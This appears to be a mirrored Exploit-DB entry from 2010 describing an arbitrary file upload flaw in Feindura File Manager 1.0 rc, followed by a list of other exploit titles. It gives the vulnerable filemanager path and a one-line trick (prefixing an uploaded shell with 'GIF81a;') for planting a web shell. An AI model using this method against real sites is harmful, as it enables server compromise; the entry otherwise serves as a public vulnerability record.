Feindura File Manager 1.0(rc) – Arbitrary File Upload

Exploit Database
6 阅读

作者： KnocKout

日期： 2010-10-07
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/15217/

===================================================
Feindura File Manager 1.0(rc) - Remote File Upload
===================================================

~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockoutr@msn.com
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~Web App. : Feindura - Flat File Content Management System 1.0 rc
~Software: http://feindura.org/
-Demo : http://demo.feindura.org/
~Vulnerability Style : File Upload
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
~~~~~~~~ Explotation ~~~~~~~~~~~
 
Shell Upload . you use "GIF81a;"
================================
http://TARGET/path/library/thirdparty/filemanager/
================================
[+]Remote File uploaded.
 
 
 
GoodLucK ;)


# Inj3ct0r.com [2010-09-28]

last Exploits
Feindura File Manager 1.0(rc) – Arbitrary File Upload的更多信息

Joomla! Component Event Registration Pro Calendar 4.1.3 – SQL Injection：
Joomla! Component Spinner 360 1.3.0 – SQL Injection：
iGaming CMS 1.5 – Blind SQL Injection：
SuiteCRM 7.10.7 – ‘record’ SQL Injection：
WebBiblio Subject Gateway System – Local File Inclusion：
WordPress Plugin Zingiri Web Shop 2.4.3 – ‘uploadfilexd.php’ Arbitrary File Upload：
Clipperz Password Manager – ‘/backend/PHP/src/setup/rpc.php’ Remote Code Execution：
Istgah For Centerhost – ‘view_ad.php’ Cross-Site Scripting：